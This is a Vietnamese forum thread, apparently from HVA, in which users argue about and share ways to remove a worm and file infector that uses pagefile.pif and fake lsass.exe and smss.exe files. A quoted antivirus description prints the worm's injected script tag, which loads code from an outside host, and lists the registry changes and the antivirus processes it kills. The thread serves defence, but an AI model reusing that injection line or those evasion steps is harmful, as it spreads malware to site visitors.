|
|
tmd wrote:
PS: Tui có hai ví dụ về 2 sư phụ "nổ to mồm" rồi biến mất trên HVA. 1. Ghostship 2. SHIDO. Tui nói thẳng ra câu bạn rất dốt nát là vì bạn trích dẫn cái đoạn bên trên đó. Có gì đừng buồn, sự thật mất lòng.
Ghê ko! cho tôi lên làm sư phụ cơ à lão tmd củ chuối Hồi mình ra đi lão ấy được lên nick xanh cơ mà nhỉ, sao giờ lại tụt xuống nick trăng thế kia nghe cái giọng vẫn chất chứa nhiều bất mãn nhỉ chắc ngoài đời người ta đì ac quá ko làm j được chỉ biết lên đây đì lại mấy em nhỏ mới chập chững tìm hiểu máy tính hả Chỉ biết bắt nạt mấy em nhỏ như vậy thì bao h mới khá được đây?
Lâu lâu ko nghịch virus nên bây giờ mù tịt nghe thấy ai nhờ xem hộ cái máy dính virus là ngại. Bây giờ chúng nó gớm quá gặp là ghost với cài lại win luôn cho nhanh ko ham hố tìm hiểu rồi diệt bằng tay như xưa nữa tìm hiểu như thế cũng thú zị nhưng mất thời gian và quan trọng là ko giúp gì cho công việc thực sự của mình kiểu diệt này chỉ hợp với mấy em học sinh sinh viên hoặc là mấy bố chuyên làm bảo dưỡng xử lý sự cố máy tính thôi
Định vào update tí kiến thức virus. Ko định đăng nhập nhưng đọc được mấy dòng của lão tmd nhắc tới minh nên hơi ngứa ngáy. đành lôi nick ra nói mấy câu với lão tmd vậy
Lão bảo mình là "nổ to mồm" mới hài chứ. Nổ hay ko tốt nhất là đừng có xét. nên xét tới những cái người ta nói có giá trị hay ko? có giúp được ai ko?
Khi tham gia ở đây thì nên xét tới mình thu được gì? có bổ ích hay ko? có giúp gì cho người khác hay kô? Một khi những ý kiến của bạn thực sự có giá trị, giúp được mọi người thì dù nhân cách của bạn có hơi tệ một chút, cách ăn nói của bạn có thô lỗ và làm mất lòng người khác thì người ta vẫn dành cho bạn một sự kính nển nhất định.
ông tmd thử nhìn vào cái số lượng bài viết của ông, lượng thời gian tham gia ở đây, được cho lên nick xanh rồi lại cho xuống, thái độ của mọi người dành cho ông ... Mà thôi, tốt nhất ko nói nhiều với lão này minh chưa đủ khả năng để chữa cho lão ấy nói nhiều với hăn tổ bực mình
Hình như lão thắc mắc tại sao tôi biến mất phải ko? đơn giản vì tôi ko còn nhiều hứng thú và thời gian để tìm hiểu về virus nữa và các chuyên mục khác ở đây thì ko phải sở trường của tôi. Có mỗi cái box tán gẫu vui vui thì bị lão comale gán zo ko biết bao nhiêu là rule, cứ làm như cái đó là server chứa toàn data cực kỳ quý hiếm vần phải bảo vệ thật chặt ko bằng
|
|
|
bluearrow wrote:
Không phải là không biết GS à,
Con này lây vào hai loại file là htm và exe. Bkav xóa được những file htm bị lây nhiễm, nhưng page.pif và các file ~*.exe, lsass.exe, smss.exe và nhữnng file exe bị lây nhiễm lại không phát hiện được.
Còn KAS thì không diệt được những file htm bị lây nhiễm.
Thế chẳng phải không diệt được triệt để là gì?
Chính vì việc không diệt được những file tiềm tàng đó nên máy mới bị "tái nhiễm".
Lúc trước dùng đến 4 thằng quét cùng lúc Bit, Nor, Bkav, Zone, sau đó chưa chắc ăn chui vô dos xóa thủ công luôn thằng page.pif, lsass.exe và smss.exe. Xin hỏi có ai biết tại sao tụi nó không diệt luôn mấy thằng này không? nếu không phân tích kỹ thì tui đâu có biết mà chui vô diệt thủ công mấy file đó sau khi quét xong!?! sở dĩ máy bị tái nhiễm vì tui không ngờ nó nhiễm vào cả những file exe trong máy.
Bạn bảo tui thiếu kiến thức căn bản thì quả là khinh người quá đáng.
Chài, Xin lỗi vì đã làm bạn phật ý! Nhưng mình nói vậy chỉ vì mình thấy bức xúc khi nhiều người cứ bị nhiễm đi nhiễm lại mấy con kiểu này ròi lại đổi cho AV kô diệt được trong khi mình dung KAV thì phat hiện và diệt cả đống mãi chả thấy bị nhiễm lại. Mình chỉ bị nhiễm con này mọt lần khi người khác ngồi vào máy và KAV thì tắt.
Bạn có thể nói rõ bạn dùng BKAV và KAV quét trong tình trạng như thế nào kô?(Tháo ổ cứng lắp sang máy sạch để quét hay là BKAV và KAV đang chạy trên chính HDH đang bị nhiễm để quét?)
Nếu các AV quét trogn tình trạng con virus này vẫn đang hoạt động cùng với win thì việc các AV kô xóa được mấy file kô có j khó hiểu. Muốn quét hiệu quả bằng các AV thì trước tiên phải làm virus ngừng hoạt động. Tháo ổ cúng lắp sang máy sạch là một cách đơn giản và hiệu quả.
Còn nếu quét khi virus đã ngừng hoạt động mà vẫn kô diệt được mấy file kia thì có thể do các file ~.exe, page.pif, lsass.exe và smss.exe được để ẩn mức hệ thống nên các AV đôi khi ko phát hiện ra (Nhiều lân khi mình cắm USB có file virus ẩn và chưa mở ẩn KAV cũng kô báo nhưng sau khi mở ẩn hệ thống thì KAV cũng réo ầm ĩ và phát hiện ra)
Cho dù con virus này có lây vào các file .exe nhưng nếu máy bạn cài KAV đã update con này và luôn luôn để chạy canh phòng thì máy bạn cũng kô thẻ nhiễm lại do bạn mở file .exe đã bị nhiễm vì chỉ cần mở vào thư mục chứ file bị nhiễm là KAV đã réo lên báo có file nhiễm và đòi disinfect. Mình kô hiểu bạn bị nhiễm lại do các file .exe đã bị nhiễm như thé nào? KAV của bạn có chắc là mới được update kô?
|
|
|
Vừa gặp lại con này ở máy thằng bạn. Phiên bản mới của nó gớm thật. Procexp cũng kô dùng với nó được nữa. Có vẻ thằng viết con này rất chăm chỉ đi update cái tác phẩm này của nó .
Pó tay với nó trong môi trường Win đành cho đĩa BOOT vào rồi restart, vào DOS để del cái file ~.exe trong Startup của All Users.
Xóa xong cái ~.exe thì restart tiếp. vào đến win thì kô thấy 2 Process kia nữa chứng tỏ nó vẫn chỉ dùng 1 kiểu kích hoạt này thôi. Nếu nó làm phong phú hơn cái công đoạn kích hoạt thì chắc là mình mệt hơn tí
Định cài BKAV ra dọn xác của nó nhưng kô biết nó phá win kiểu gì mà kô cài được. ngay cái lickdup đầu tiên vào cái file BKAV nó đã hiện ra cái bẳng báo lỗi quái j ấy (mệt chả buồn đọc nội dung nó là j ) định cài KAV nhưng cũng bị lỗi tương tự. Kô còn hứng thú với nó nên đành GHOST cho nó phát Ghost xong thì cài KAV ra cho nó scan rồi phục hồi những file bị nhiễm trong mấy ổ DATA.
Cách đơn giản (dễ hiểu) nhất để diệt chiệt để con này mà mịt biết là: tháo ổ cứng cắm vào một máy sạch có cài kaspersky đã update con này rồi cho KAV quét hét các ổ của máy bị nhiễm. KAV có thể phục hồi được các file bị nhiễm nên kô sợ bị mất dữ liệu. BKAV hình như cũng làm được nhưng mình chưa thử. máy yếu thì cứ dùng luôn BKAV cho nhẹ nhàng đơn giản.
Khi đã quét xong thì lắp lại ổ về máy cho đĩa win vào cho nó repair lại win để đỡ phải cài lại các chương trình và mất dữ liệu trong ổ C. Còn nếu kô có j quan trọng thì Ghost cho nhanh.
bluearrow wrote:
Éc éc, xin các bạn cho biết những file nó lây nhiễm là gì, vì tình hình chung là các AV không có thằng nào diệt triệt để được con này.
Mình vừa vào trang của BKAV gõ vào chữ pagefile.pif thì tìm được khá nhiều thông tin về con này.
http://www.bkav.com.vn/thong_tin_virus/17/03/2008/3/1475/
Mô tả kỹ thuật:
* Xóa các key :
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
* Ghi giá trị :
"AppInit_DLLs" = "C:\\WINDOWS\\system32\\dnsq.dll"
Vào key : HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows để dll của virus được nạp lên mỗi khi windows khởi động
* Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
* Tạo Mutex : CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.
* Dump ra các file :
%SysDir%\Com\smss.exe
%SysDir%\Com\netcfg.dll
%SysDir%\Com\netcfg.000
%SysDir%\dnsq.dll
* Sửa key làm mất checkbox để hiển thị các file hệ thống.
* Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
* Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard
* Tắt các service : EQService, HookSys, McShield, tmmbd, PAVSRV, SymEvent, ekrn, KAVBase, klif, AntiVirService, MPSVCService
* Tắt các cửa sổ có chứa 1 trong các xâu : ewido, bitdefender, facelesswndproc, mcafee, metapad, dr.web, avg, arp, 360safe, 360anti, ida, ...
* Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
<script src="http://js.k01[removed].com/01.asp"></script>
* Lây nhiễm vào các file thực thi tìm được trong máy.
Kô phải AV kô diệt được triệt để con này mà là người diệt kô biết cách diệt triệt để thôi. Chính sự thiếu những kiến thức cơ bản trong việc phòng chống virus của người dùng máy là nguyên nhân chính làm con này và nhiều con tương tự quay lại và làm họ tưởng các AV kô diệt được . NẢN !!!
|
|
|
LovesPascal wrote:
Nói chung phải repair lại máy hay cài lại đi, thấy rắc rối quá, thảo luận nhức cả đầu
Hèm! lúc nào cũng chỉ có 1 câu repair lại máy 2 câu cài lại đi mà topic nào cũng thấy cậu nhẩy zoo cậu muốn thành ngôi sao spam mới chăng? Nếu có tư tưởng như vậy thì cậu vào đọc box virus làm j? box virus mở ra để khuyên người ta cài lại máy khi gặp virus sao?
Cậu có biết nếu kô có mọt chút kiến thức về virus thì dù có cài lại Win thì cũng sẽ nhiễm lại như thường (kô biết diệt autorun.inf và các mầm móng khác trong ổ dữ liệu) Cho dù có format hết cả các ổ dữ liệu thì việc nhiễm lại qua các hoạt động trao đỏi dữ liệu cũng chỉ là thời gian.
Còn cái cách repair lại máy có phải là repair lại win kô bạn? ai nói với bạn là làm thế hết virus vậy? bạn đã bao giờ thử chưa?
Nói thật với bạn là những reply của bạn làm tôi khá là khó chịu đấy. nếu là cách đây mấy tháng thì có lẽ tôi đã dành cho bạn những lời "ngọt ngào" hơn
|
|
|
nguoi_moi_biet wrote:
Theo dõi cả chủ đề này tôi thấy những máy có khả năng bị nhiễm là máy xuất hiện các file SMSS, LSASS ở trong processes nhưng đây cũng là các file của Win. Vậy có chúng ta phân biệt như thế nào vậy? Cái nào là của Win cái nào là do Virus tạo ra?
Cách phân biệt đã có reply nói rồi nhưng chắc là nhiều reply quá bạn kô thấy nên mình nói lại vậy.
Nếu xem process bằng task manager thì dùng cột User Name để phân biệt. Nếu ở cột User Name ghi SYSTEM thì đó là Process của Win còn nếu kô (là tên account mà bạn đang dùng) thì đó là process của con này.
Nếu xem bằng một tool cho tho hiện path của file (như IceSword, Procexp...) thì phân biệt bằng path. Cái nào có path là C:\WINDOWS\system32\ là của Win còn cái nào có path là C:\WINDOWS\system32\Com thì là con này.
Kinh thật, cái topic này sắp vào top topic có lượt xem nhiều nhất roài
|
|
|
muahang wrote:
Gà chào Ghost Ship!
Vâng! GS chào Gà và thưa với Gà là GS cũng là Gà thôi
Topic của bạn rất hay và nó giúp mọi người có một cách giải quyết con virus!
Cảm ơn bạn có lời khen và mình thấy topic này đã cung cấp khá nhiều cách giải quyết con virus này chứ kô phải 1 cách như bạn nói
Tuy nhiên cần đọc gần hết các bài viết và ngồi tổng hợp lại!
Mình cũng muốn thế nhưng mà dạo này mình kô có hứng lắm. Mà mình thì kô thích tổng hợp những cái mà mình chưa kiểm tra nên mọi người đành chịu khó đọc rồi thử rồi tự rút ra vậy
Trong registry mình cũng ko có biết khóa nào làm mất checkbox hiện file ẩn hệ thống.
Cũng không biết processxp có chức năng suspend? )
Mấu chốt của việc diệt con này là xóa được cái file ~.exe và các file pagefile.pif khi 2 process LSASS.EXE và SMSS.EXE kô hoạt động. mình thấy cái chức năng suspend của procesxp đơn giản thế mà sao kô có ai thử và cho ý kiến nhỉ?
Cách dùng chức năng suspend của processxp để diệt con này:
1. mở Processxp (ai chưa có trong máy thì gõ processxp vào google rồi down về )
2. Tìm đến dòng LSASS.EXE rồi click chuột phải vào cái dòng ấy.
3. Click tiếp vào cái dòng suspend trong menu hiện ra.(để ngừng hoạt động của Process LSASS.EXE nhưng kô làm nó biến mất nhằm lừa cái SMSS.EXE rằng thằng LSASS.EXE vẫn đang hoạt động )
4. Tìm đến dòng SMSS.EXE rồi click chuột phải vào cái dòng ấy rồi chọn cái dòng kill process trong cái menu hiện ra nhằm Kill luôn cái thằng SMSS.EXE. Lúc này cái thằng LSASS.EXE cũng đã bị kill và chỉ còn cái xác khô dựng ở đấy để lừa thằng SMSS.EXE này --> cả 2 thằng đều đã bị kill
5. Bây h thì các bạn tìm đến các file của nó và xóa thôi. các file của nó là file nào và ở đâu thì trong topic này nói quá nhiều rồi. Chú ý kô click dúp để mở ổ khi chưa xóa file pagefile.pif trong ổ.
Đấy là 5 bước vô hiệu sự hoạt động của phần Worm. Việc tiếp theo là diệt và phục hồi phần virus là những file đã bị lây nhiễm trong máy. phần này thì kô nên làm bằng tay mà các bạn nên down một AV đã update con này để quét toàn bộ các ổ. (BKAV làm việc này rất tốt)
Cuối cùng là phục hồi mấy chức năng của win bị con này phá. (nếu bạn kô dùng đến mấy chức năng này thì chả cần khôi phục cũng được ) Phần này thì lấy file .bat của pác NGVANTEO là ok. Riêng cái local security thì hình như chưa có cách phục hồi mà mình cũng kô biết nó bị phá thé nào. chưa thử phiên bản mới của nó
|
|
|
@buonca: Nếu mình kô nhầm thì cái thông báo ở hình đầu của bạn nó có nghĩa là:" Windows kô thể mở file pagefile.sys trong C:\. Kô thể truy cập vào file đó vì nó đang được sử dụng bởi một tiến trình khác"
Và theo mình biết thì pagefile.sys là file khá quan trọng của hệ thống và windows thường ngăn ko cho người dùng táy máy vào nó nên caí thông báo kia là bình thường.
Thêm nữa, theo mình nhớ là trong bài hướng dẫn kia thì cái file cần browse là file pagefile.pif chứ kô phải là pagefile.sys đâu bạn thân mến ạ!
Nếu trong các ổ của máy bạn kô có file pagefile.pif thì nghĩa là máy bạn kô bị dính con này và bạn áp dụng cái hướng dẫn kia có vẻ hơi vô nghĩa
Trong hình 2 mình thấy máy bạn vẫn mở được ẩn hệ thống và những thứ mà bạn khoanh tròn đỏ là những file bình thường của windows nó được nhìn thấy như trong hình khi ẩn hệ thống được mở.
Khi máy bị nhiễm những con worm "vớ vẩn" thì máy thường bị khóa ẩn hệ thống. (có nhiều con khủng (đối với iêm) cũng khóa cái này ) mà máy bạn thì đang mở được ẩn hệ thống nên mình kết luận là máy bạn đang kô bị nhiễm những con worm vớ vẩn nhưng có thể là đang nhiễm những "cực kỳ vớ vẩn" (từ thời khóa ẩn chưa phổ biến ) hoặc có thể nó đang nhiễm một con khá khủng mà nó khô thèm khóa ẩn
Về cái con pagefile.pif thì mình nghe nói phiên bản mới của nó đấ phá cả cái Policies nên ko thể diệt nó băng Policies được nữa. trừ khi có pro nào hiến kế khôi phục được cái policies .
LovesPascal wrote:
Cái đó cài lại windows đi bạn! càng làm thấy càng ngu đó, mệt lắm. Đưa ra hướng giải quyết làm rối tung mọi chuyện.
Nghe tui càng lại windows đi, cài nhanh mà
chài, gán cái chữ Pascal trên nick mà lại phát ra những câu như thế sao? Nếu kô hiểu biết về virú thì kô nên đưa ra những cái reply kiểu như vậy trong box virus bạn nhá. vào một diễn đàn danh tiếng mà lại đọc được những lời như vậy thì dễ làm ngừoi ta thất vọng lắm đấy.
|
|
|
gaconngikvirus wrote:
Mình đã làm như GS là vô Software Restriction Policies rồi nhưng nó chỉ hiện ra 3 cái là : Enforcement , Disignated File Types và Trused Publisher chứ kô có mục Additional Rules như GS nói .
Nếu cái Local Security Policy của bạn nó kô giống như hình dưới thì mình cũng kô biết thế nào. Chẳng nhẽ đây là phiên bản mới và nó đã phá Local Security Policy
Note : Con Virus này nằm trong C:\Windows\System32\Com . Vậy mình Back Up lại ổ C thì nó có mất lun ko . Mong anh em chỉ với
làm sao mà mất được. Mà còn tùy vào chuyện bạn back up như thế nào.
|
|
|
gaconngikvirus wrote:
Còn dùng cái Local Security Policy , em vô muc Software Restriction Policies nhưng khi chọn menu action thì chỉ hiện ra dòng Export List ko hiện ra dòng như bác GS nói
Mình nghĩ là bạn đang trỏ chuột vào dòng Software Restriction Policies chứ kô phải dòng Additional Rules nên mới chỉ có dòng Export List
Bạn có thấy trong mục Software Restriction Policies có mục Additional Rules kô?
Bạn hãy click chuột phải vào cái dòng Additional Rules --> Trong cái menu hiện ra bạn hãy click tiếp vào cái dòng New Hash Rule
|
|
|
Hic các đại ka toàn dùng từ ngữ chuyên môn khó hiểu vãi mà mình thì cũng kô còn hứng thú với bọn vi rut như xưa nên cũng chẳng có hứng thú đi search xem mấy cái từ chuyên môn ấy nghĩa là thế nào nên cũng chả có hứng nhảy zo pon chen
Đối với em thì con cũng như con nào nó đều phải có phần hoạt động và phần lây nhiễm. để tiêu diệt một con thì đầu tiên em thường xác định xem phần hoạt động của nó có những file nào được kích hoạt như thế nào rồi tìm cách vô hiệu phần hoạt động ấy.
Tiếp theo là dọn dẹp cái phần lây nhiễm. Nếu kô phải là loại lây file thì việc này đơn giản. còn nếu là loại lây file thì phải nhờ tới các AV đã update để quét phát hiện ra file bị nhiễm.
Nếu file bị nhiễm là file quan trọng kô lấy ở đâu được thì mới nghĩ tới việc cứu chữa. còn kô thì cứ cho Av nó del thẳng tay kô thèm tiếc.
Quan trọng là ý thức và sự hiểu biết khi sử dụng máy tính thôi. chứ chỉ cách diệt nhưng kô biết cách phòng thì cũng bằng hòa.
@daicvm: Đa hình là thế hả bạn? hic sợ quá!
|
|
|
conmale wrote:
Quả là còn sót phần quote như hts đã đưa ra. Cám ơn hts đã thông báo. Anh sẽ fix lỗi này trong bản cập nhật tới.
Riêng phần xem bài ẩn theo tên tác giả thì không được vì lỗi này đã fix trước đây.
Thân mến.
Để xem bài ẩn trên HVA iêm thường làm như sau:
1. đăng nhập
2. vào topic có bài ẩn
3. ấn vào nút "trả lời"
4. kéo chuột xuống để xem. Chả có bài nào bị ẩn cả
Cái kiểu xem như của của em là do sót phần nào thế pác conmale Pác có thể nói cho iêm biết vì sao bài post của em trong topic này mấy tiếng trước đã bị delete kô ạ?
|
|
|
Cách dùng Local Security Policy để vô hiệu và diệt con này:
1. Lấy mẫu virus:
1.1: Start --> Run
1.2: Gõ vào Run đoạn lệnh sau: attrib -s -h C:\pagefile.pif (nếu máy bạn Có ổ C )
1.3: Enter
1.4: Thử vào ổ C xem có cái file pagefile.pif hiện ra kô? nếu kô có thì làm lại ở ổ khác hoặc down luôn cái file pagefile.pif ở bài đầu tiên của topic này
2. dùng Local Security Policy để vô hiệu sự hoạt động cua nó: Muốn hiểu rõ hơn thì vào đọc: /hvaonline/posts/list/5867.html
2.1: vào Local Security Policy: Start -->Control Panel --> Administrative Tools --> Local Security Policy.
2.2: Nếu đây là lần đầu tiên bạn thao tác trên policy này thì bạn cần khởi tạo nó bằng cách: tìm đến mục Software Restriction Policies, chọn menu Action --> New Software Restriction Policies (hoặc Create New Policies).
2.2: Thiết lập Security Level cho các malwares đã được xác định:
- Chọn vào mục Additional Rules của Software Restriction Policies, chọn menu Action --> New Hash Rule. Một dialog sẽ hiện lên.
- Tiếp tục nhấn vào Browse và tìm đến ổ C rồi chọn file pagefile.pif đã được làm hiện ra ở bước 1
- Tiếp tục chọn Security Level = Disallowed để vô hiệu hoá khả năng thực thi của malware. (nếu thấy nó là Disallowed rồi thì kô cần chọn lại nữa )
- Nhấn OK.
- Restart lại máy. (Xong)
Từ bây giờ thì bạn cứ vô tư click đúp lên con virus này hay bất kỳ file .exe nào đã bị nhiễm con này nó sẽ kô thể chạy trên máy của bạn được nữa đâu (trừ khi bạn làm lại win hoặc làm mất cái vừa tạo ra ở bước 2 hoặc bạn click đúp lên phiên bản khác của con này nếu là phiên bản khác thật thì làm lại các bước trên với cái phiên bản khác đó thì rồi cũng vô tư thôi )
Nếu bạn muốn dọn dẹp xác của con virus này trên máy của bạn thì bạn hãy cài BKAV (nghe nói BKAV diệt file bị nhiễm con này rất nuột (chỉ Fix chứ kô Del) hoặc một AV nào đó mới update về cài rồi quét toàn bộ các ổ. Nếu bạn nhiễm đã lâu thì có thể sẽ mất khá nhiều (có thể là tất cả) file .exe trong các bộ setup đấy, xin chia buồn!
Đơn giản vậy thôi. Hi vọng kô còn ai vào đây nói là:"sau khi đọc xong tôi vẫn chẳng biết phải diệt nó như thế nào!" Hic nản quá thể
|
|
|
Đúng vậy,USB của em có cả đống file bị ẩn mà giải ẩn theo lệnh attrib -s -h không được(lỗi như vầy luôn).Các bác giúp em cái với.
Bạn mới thực hiện lệnh attrib trên máy của bạn hay là đã thử trên nhiều máy?
|
|
|
taiyou wrote:
Em xin tóm tắt lại tình trạng cái USB của em như sau : worm là autorun.inf và 1 thư mục rỗng Runaut.. ( Runatu~1) kiểm tra dung lượng thì là 0kb dùng Fast helper scan thì thấy autorun.inf và diệt,đã tháy mất file autorun.inf,thử format luon cũng ko đc, và mỗi khi cắm lại usb thì file autorun.inf lại xuất hiện.( đã scan toàn bộ máy trong safe mode và đã tắt system restore). Đã dùng mọi cách để format như đã nói ở trên....và các file trong usb ko thể copy ,xóa hay làm gì, copy ở ngoài vào cũng ko đc.
Nếu cái file autorun.inf đã bị FH xóa hay bạn xóa tay mất mà khi tháo USB ra rồi cắm lại lại thấy có(có khi chỉ cần refresh trong USB 1 cái) là lại thấy nó hiện ra thì chứng tỏ là con này đã được kích hoạt và đang hoạt động trong hệ thống của bạn. Có thể chính vì nó đang chạy nên những thao tác kia mới ko có tác dụng như vậy. Bạn hãy mạng USB đó cắm sang máy khác( kô bị nhiễm con này) rồi dùng lại lệnh rd /s xem có xóa được kô.
Đừng có vào USB bằng cách click đúp! kô thì cái máy chưa nhiễm lại nhiễm luôn thì bằng hòa cả làng đấy. Nếu biết mở USB đúng cách thì kô bao giờ nhiếm cái con này!
|
|
|
Tung hô gì đâu? có người hỏi thì trả lời thôi chẳng nhẽ lập topic rồi vứt đấy thì lại bị chưởi là đồ vô trách nhiệm.
mà một con thường có tới mấy phiên bản, phiên bản sau chưa chắc đã diệt được theo cách cũ nên vẫn cứ phải nói tiếp chớ?
Cậu xóa cái RUNAUT~1 như thế nào vậy? có giống ở đây kô?
|
|
|
Chà mình thấy kiến thức của bạn cũng kô phải là ít đâu, biết chừng ấy là đủ chơi với virus rồi.
Máy chậm thì kô hẳn là do virus đâu bạn ạ, nếu máy để quá nhiều ứng dụng khởi động cùng với máy thì máy cũng khởi động chậm và chạy ì ạch.
Mình thường có thói quen khi khởi động vào đến win là mở task manager ra kiểm tra xem có bao nhiêu process, nếu nhiều hơn bình thường thì mình sẽ tìm xem đó là process nào, có phải của hệ thống hay ứng dụng nào an toàn kô, tại sao nó lại được kích hoạt lúc này, nếu kô cần thiết thì kill và kô cho nó khởi động cùng với máy nữa. với thói quen này mình đã phát hiện sớm và điều trị kịp thời kô biết bao nhiêu con
Mình luôn để KAV (update thường xuyên update) chạy khởi động cùng win nên nếu bị nhiễm thì cũng khó thoát mà dù con đó có mạnh hơn KVA thì nó cugnx thường làm KAV đen thui kô hoạt động được nên đó cũng là một dấu hiệu để mình tiến hành kiểm tra sâu hơn.
Nếu con nào kô có process riêng mà ký sinh ở một process nào đó của hệ thống, mình kô thể phát hiện ra bằng cách kiểm tra process được thì mình sẽ dùng msconfig, Autoruns, hijackthis để kiểm tra những cái nào được khởi động cùng máy xem có cái nào khả nghi không. rồi search trong %Windir% xem có những file nào mói được tạo ra, file nào khả nghi thì cho vào google để xem nó thế nào.
virus lây file bây giờ cũng thường dựa vào kiểu lây nhiễm của worm để tồn tại nên việc phát hiện và diệt nó cũng kô khó. diệt phần worm xong thì phần virus cũng chết theo vấn đề chỉ là dọn rẹp hậu quả nó gây ra thôi. hậu quả nặng hay nhẹ còn thì còn tùy vào việc phat hiện sớm hay muộn và hiểu biết của người dùng.
Kết luận:Con nào kô có process riêng, kô khóa task manager, kô khóa ẩn system(mình luôn mở), kô khóa KAV, kô làm tốn tài nguyên hay, kô gây ra các hiện tượng lạ thì sẽ chơi được mình
Ngày trước mình có dính một con, nó vừa vào máy cái là lây ngay vào tuốt mấy file .exe trong %windir% đơ cứng luôn máy --> phải ấn restart nhưng lúc vào tới nơi thì nó với KAV oánh nhau loạn xì ngậu cũng đơ kô kém. thỉnh thoảng KAV hiện ra cái bảng del hay skip? kô del thì cái bảng ấy lại hiện ra. del nhiều quá mỏi tay thế là mình chon cái apply all --> một lúc sau máy tắt phụt rồi kô vào win được nữa kô còn gì để nói về nó
luôn chạy một AV tương đối mạnh để canh phòng nhất là khi rời máy cho người khác ngồi.
lủng củng thật. nó cũng lằng nhằng nên hơi khó hệ thống
p/s: trả lại cho iêm
|
|
|
hoanguyenvn wrote:
Xin cho hỏi. Trong các bài viết phía trên, các bác có nói đến con LSASS.EXE (viết hoa), còn trong máy của em, khi chọn Task Manager thì lại có lsass.exe (viết thường). Không biết có phải dính không hay là một services của Windows nhỉ ?
Nếu ở User Name trong task manager của cái cslass.exe ghi là SYSTEM thì đó là process của hệ thống còn nếu ở cột User Name mà ghi tên của account (tài khoản người dùng trong win) bạn đang dùng thì nó chính là con virus này.
file lsass.exe của hệ thống luôn luôn chạy, máy nào cũng thấy. Khi bị nhiễm con này thì nó sẽ có thêm cái LSASS.EXE nữa nên trong danh sách process sẽ có 2 lsass.exe.
Híc pác Hoàng làm iem tổn thọ quá. thôi iem kô đàm điếc gì ở đây nữa.
|
|
|
Hay đây là phiên bản mới của con này nên nó quái hơn cả ngày xưa nhỉ
1. Vì nó báo lỗi là file (nó là folder chứ nhỉ) đang bị sử dụng bởi process khác nên cậu thử mang USB sang máy khác và thử lại lệnh rd /s xem thế nào. liệu có phải con này đang chạy trên máy cậu và nó bảo vệ cái thư mục ấy như vậy kô.
2. Nếu kô cần data thì bạn thử format USB xem có được kô? ngày xưa mình chưa thử format
|
|
|
VXer wrote:
Hơ hơ
Bạn GS backup file .exe của hệ thống bằng cách nào thì tôi cũng có thể backup rồi đổi phần mở rộng như thế!
vậy bạn đổi cái phần mở rộng ấy như thế nào (kô phải rename bằng tay từng file 1 đấy chứ sơ sơ 400 file thôi mà . nếu bạn làm bẳng tool hay lệnh gì thì chia sẻ cho tôi với tôi chưa biết làm thanks trước nhé )? và quan trọng nhất là bạn đổi như vậy để làm gì?
Bạn có nói bạn làm cách nào không nhỉ
Tôi backup chúng như sau:
1. Search trong %windir% từ khóa .exe để hệ thống liệt kê tất cả các file .exe ra.
2. Ấn Ctrl + A để select tất cả những file .exe tìm được.
3. Ấn Ctrl +C để copy tất cả những file đó.
4. paste ra một thư mục trống.
5. Zip lại (xong)
Copy file rồi đổi tên thì thiếu gì cách
1. Copy lần lượt từng file như bạn nói
2. Dùng tool, CT có sẵn (Total commander hình như cũng có tính năng này, hoặc FAR manager ...)
3. Dùng tool ... tự viết
4. Giả sử bạn muốn sao lưu rồi đổi tên .exe trong thư mục C:\Windows thành .exx lưu vào thư mục D:\Backup, sử dụng chương trình XCopy (Không chắc có trong mọi phiên bản Windows hay không)
XCopy /Q /E C:\Windows\*.exe D:\Backup\*.exx
Còn có thể có cách khác nữa ...
Với cách thứ 4 của bạn thì mỗi file phải gõ lệnh 1 lần à hay là có một lệnh hay cụm lệnh làm được việc đó với tất các các file trong %windir%?
Đúng là cách của tôi cũng chỉ cứu được win thôi chứ kô cứu được các ứng dụng thật muốn phục hồi được cả các ứng dụng thì môi lần cài xogn cái gì lại phải copy file .exe của nó cất đi có hiệu quả nhưng kô pro chút nào
Với những dữ liệu kiểu doc, xls .. mà bị dính thì up lên đây nhờ pác Hoàng hay pro nào đó viết tool phục hồi là lựa chọn của tôi
|
|
|
born2die wrote:
Trời đất ơi, đọc kỹ mới nhận ra rằng hóa ra thằng GÀ GS tưởng nó diệt được con này bằng tay, bó cờ him
Chúc gà ngày một gà hơn với những suy nghĩ AQ như vậy.
Cậu thử nói ra thế nào là "diệt được con này" tôi xem nào? (như thế nào thì được gọi là đã diệt được một con virus?)
Cái tư duy lùn tịt của cậu mà đòi viết được tool á? nếu có up được lên cái tool diệt được lên thì chắc cũng là đi chôm chôm ở đâu thôi. Ngay từ cái reply đầu tiên đã thấy lòi cái đuôi gà ra rồi vậy mà vẫn còn cha kố bám tới bây giờ.
|
|
|
karkar wrote:
điều gì đã khiến bạn cười nhiều thế này vậy?
cách diệt bằng tay tuy hay đấy nhưng mà chỉ thích hợp với worm thôi còn virus thì bó tay , dùng AV cho nó nhanh
con này vừa là worm vừa là virus bạn ạ. mà vấn đề ở đây là lkhooi phuc lại những file hệ thống bị nhiễm. dùng AV thì kô phải Av nào cũng khôi phục mà nó thường del luôn dẫn đến hỏng win luôn --> AV chỉ thích hợp để quét ở phần dữ liệu và phần hệ thống kô quan trọng.
karkar wrote:
bác BKAV nhà ta tuy trông có vẻ ghẻ nhưng rất hay đấy các bác đừng có chê nó có thể gỡ bỏ virus khỏi host mà file host vẫn hoạt động tốt ,quá hay còn gì
hiện giờ em đang dùng AVAST HOME 4.7 với bkav ,cả hai đều thường xuyên cập nhật nên em chẳng sợ thằngnàocả.
dùng mạng hơn tháng thường xuyên vào web sex ,crack ,mà chẳng thấy máy bị nhiễm virus ,lạ thật đấy ???
